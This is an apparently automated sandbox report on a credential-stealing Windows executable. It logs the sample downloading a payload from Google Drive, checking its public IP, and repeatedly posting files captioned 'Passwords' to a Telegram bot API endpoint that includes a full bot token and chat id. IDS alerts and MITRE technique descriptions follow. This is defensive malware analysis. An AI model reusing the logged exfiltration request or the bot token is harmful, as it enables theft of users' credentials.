Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3367a8105a58Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd337dd438127dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd339688ded35dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33b076f9a624Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33ca520e7546Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33e6acba1ad5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd340583ccdc25Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3426d43febc9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34480a945b45Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd346e41e58404Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3496e44435c9Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34c5bacc94c0Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34f46a70432aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3537167c6af8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd357c0f145e3dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd35b812061467Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3602d21a3415Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd366edcb90021Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd36fd39d5822dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd37464fcfa082Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd37840a32eeabHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd37db51e674d1Host: api.telegram.orgContent-Length: 1090
Source: global traffic	HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31947219ce40Host: api.telegram.orgContent-Length: 1090

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: 6ZoBPR3isG.exe	Virustotal: Detection: 41%			Perma Link
Source: 6ZoBPR3isG.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36AEE41Ah	3_2_36AEDFF2
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36AEDB79h	3_2_36AED8C8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36AEE41Ah	3_2_36AEE347
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B99DE5h	3_2_36B99AA8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9E3C8h	3_2_36B9E120
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9F528h	3_2_36B9F280
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9B1A0h	3_2_36B9AEF8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9F980h	3_2_36B9F6D8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9F0D0h	3_2_36B9EE28
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B998F9h	3_2_36B99650
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9BA50h	3_2_36B9B7A8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9FDD8h	3_2_36B9FB30
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9B5F8h	3_2_36B9B350
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9C758h	3_2_36B9C4B0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B98799h	3_2_36B984F0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9DF70h	3_2_36B9DCC8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9BEA8h	3_2_36B9BC00
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9DB18h	3_2_36B9D870
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9C300h	3_2_36B9C058
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B99049h	3_2_36B98DA0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B994A1h	3_2_36B991F8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9EC78h	3_2_36B9E9D0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B9E820h	3_2_36B9E578
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 36B98BF1h	3_2_36B98948
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then push 00000000h	3_2_371F8770
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F51ADh	3_2_371F4FD0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F5B37h	3_2_371F4FD0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F19D8h	3_2_371F1730
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F2288h	3_2_371F1FE0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F40F0h	3_2_371F3E48
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F0FF0h	3_2_371F0D48
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_371F9567
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F3840h	3_2_371F3598
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F26E0h	3_2_371F2438
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F0740h	3_2_371F0498
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_371F44CF
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_371F4CF3
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F2F90h	3_2_371F2CE8
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_371F4B13
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F1E30h	3_2_371F1B88
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then push 00000000h	3_2_371F92AF
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F33E8h	3_2_371F3140
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F144Ah	3_2_371F11A0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F3C98h	3_2_371F39F0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F02E8h	3_2_371F0040
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F2B38h	3_2_371F2890
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then jmp 371F0B98h	3_2_371F08F0
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then push 00000000h	3_2_3775C068
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	3_2_3775CE78
Source: C:\Users\user\Desktop\6ZoBPR3isG.exe	Code function: 4x nop then push 00000000h	3_2_3775CBB6

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.3:49982 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.3:49979 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.3:49957 -> 172.217.16.206:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
